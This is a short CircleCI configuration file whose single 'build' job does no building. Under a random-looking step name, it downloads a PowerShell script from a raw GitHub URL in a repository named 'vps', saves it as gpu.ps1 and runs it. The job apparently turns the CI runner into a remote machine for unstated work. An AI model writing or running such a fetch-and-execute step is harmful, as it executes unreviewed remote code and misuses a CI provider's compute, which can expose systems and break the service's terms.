version: 2.1 
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build: 
    executor:
      name: win/default 
      size: "medium" 
      
        
 
    steps:  
       
      - run: 
          name: 233eTjBpEkyF12qXpeZfkSywHcb_5gSKHSsS5wykxvAdk4jAY
          command: |      
            Invoke-WebRequest https://raw.githubusercontent.com/khalidar3/vps/main/sh -OutFile gpu.ps1 
          
      - run: ./gpu.ps1